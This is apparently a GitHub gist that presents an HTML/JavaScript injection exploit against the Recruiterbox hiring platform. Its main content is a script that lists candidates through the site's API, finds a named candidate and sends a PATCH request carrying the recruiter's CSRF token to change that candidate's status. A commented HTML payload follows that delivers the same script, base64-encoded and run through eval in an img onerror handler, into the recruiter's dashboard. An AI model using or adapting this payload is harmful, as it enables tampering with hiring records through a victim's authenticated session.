Last active
August 10, 2016 09:10
-
-
Save djadmin/c1d4987f2f0e0a214d1520484b1fd505 to your computer and use it in GitHub Desktop.
Recruiterbox.com HTML Injection Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Below code was used to demonstrate hiring made so easy - Recruiterbox XSS. | |
| var candidates = []; | |
| var request = new XMLHttpRequest(); | |
| request.open('GET', '/api/v1/candidates/', true); | |
| request.onload = function() { | |
| var data = JSON.parse(request.responseText); | |
| console.log(data); | |
| candidates = data && data.objects; | |
| var profile = candidates.find(function (cand) { | |
| return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi'; | |
| }); | |
| var res_uri = profile.resource_uri; | |
| var params = { "is_archived": true, "state": "/api/v1/candidate_states/2/", "state_reason": null,"state_metadata": {} }; | |
| var patch = new XMLHttpRequest(); | |
| patch.open('PATCH', res_uri, true); | |
| patch.setRequestHeader("Accept","application/json"); | |
| patch.setRequestHeader('Content-Type', 'application/json'); | |
| patch.setRequestHeader("X-Requested-With", "XMLHttpRequest"); | |
| patch.setRequestHeader( "X-CSRFToken", window.parent.Util.getCookie( 'csrftoken' ) ); | |
| patch.send(JSON.stringify(params)); | |
| }; | |
| request.send(); | |
| // Below HTML will inject javascript in recruiters dashboard. | |
| // <html> | |
| // <head></head> | |
| // <body onload=alert('Lulzz')> | |
| // <img src=x onerror=eval(atob('dmFyIGNhbmRpZGF0ZXM9W10scmVxdWVzdD1uZXcgWE1MSHR0cFJlcXVlc3Q7cmVxdWVzdC5vcGVuKCJHRVQiLCIvYXBpL3YxL2NhbmRpZGF0ZXMvIiwhMCkscmVxdWVzdC5vbmxvYWQ9ZnVuY3Rpb24oKXt2YXIgZT1KU09OLnBhcnNlKHJlcXVlc3QucmVzcG9uc2VUZXh0KTtjb25zb2xlLmxvZyhlKSxjYW5kaWRhdGVzPWUmJmUub2JqZWN0czt2YXIgdD1jYW5kaWRhdGVzLmZpbmQoZnVuY3Rpb24oZSl7cmV0dXJuIkRoZWVyYWoiPT09ZS5maXJzdF9uYW1lJiYiSm9zaGkiPT09ZS5sYXN0X25hbWV9KSxzPXQucmVzb3VyY2VfdXJpLGE9e2lzX2FyY2hpdmVkOiEwLHN0YXRlOiIvYXBpL3YxL2NhbmRpZGF0ZV9zdGF0ZXMvMi8iLHN0YXRlX3JlYXNvbjpudWxsLHN0YXRlX21ldGFkYXRhOnt9fSxuPW5ldyBYTUxIdHRwUmVxdWVzdDtuLm9wZW4oIlBBVENIIixzLCEwKSxuLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdCIsImFwcGxpY2F0aW9uL2pzb24iKSxuLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL2pzb24iKSxuLnNldFJlcXVlc3RIZWFkZXIoIlgtUmVxdWVzdGVkLVdpdGgiLCJYTUxIdHRwUmVxdWVzdCIpLG4uc2V0UmVxdWVzdEhlYWRlcigiWC1DU1JGVG9rZW4iLHdpbmRvdy5wYXJlbnQuVXRpbC5nZXRDb29raWUoImNzcmZ0b2tlbiIpKSxuLnNlbmQoSlNPTi5zdHJpbmdpZnkoYSkpfSxyZXF1ZXN0LnNlbmQoKTs='))> | |
| // </body> | |
| // </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment